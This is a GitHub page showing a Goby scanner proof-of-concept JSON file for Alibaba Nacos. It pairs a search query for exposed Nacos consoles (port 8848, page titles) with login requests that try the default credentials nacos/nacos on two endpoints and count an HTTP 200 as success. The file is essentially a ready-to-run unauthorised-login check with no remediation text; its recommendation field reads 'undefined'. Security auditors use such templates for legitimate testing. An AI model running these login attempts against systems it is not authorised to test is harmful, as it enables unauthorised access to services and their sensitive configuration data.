-
Notifications
You must be signed in to change notification settings - Fork 8
/
Alibaba Nacos 控制台默认弱口令.json
74 lines (74 loc) · 2.75 KB
/
Alibaba Nacos 控制台默认弱口令.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
{
"Name": "Alibaba Nacos 控制台默认弱口令",
"Level": "2",
"Tags": [
"弱口令"
],
"GobyQuery": "(title=\"Nacos\" || title=\"HTTP Status 404 – Not Found\" || port=\"8848\") ",
"Description": "Alibaba Nacos 控制台存在默认弱口令 nacos/nacos,可登录后台查看敏感信息",
"Product": "Alibaba Nacos",
"Homepage": "https://github.com/alibaba/nacos",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"OR",
{
"Request": {
"method": "POST",
"uri": "/nacos/v1/auth/users/login",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "username=nacos&password=nacos"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/v1/auth/users/login",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "username=nacos&password=nacos"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-01-25 15:46:58",
"GobyVersion": "1.8.237"
}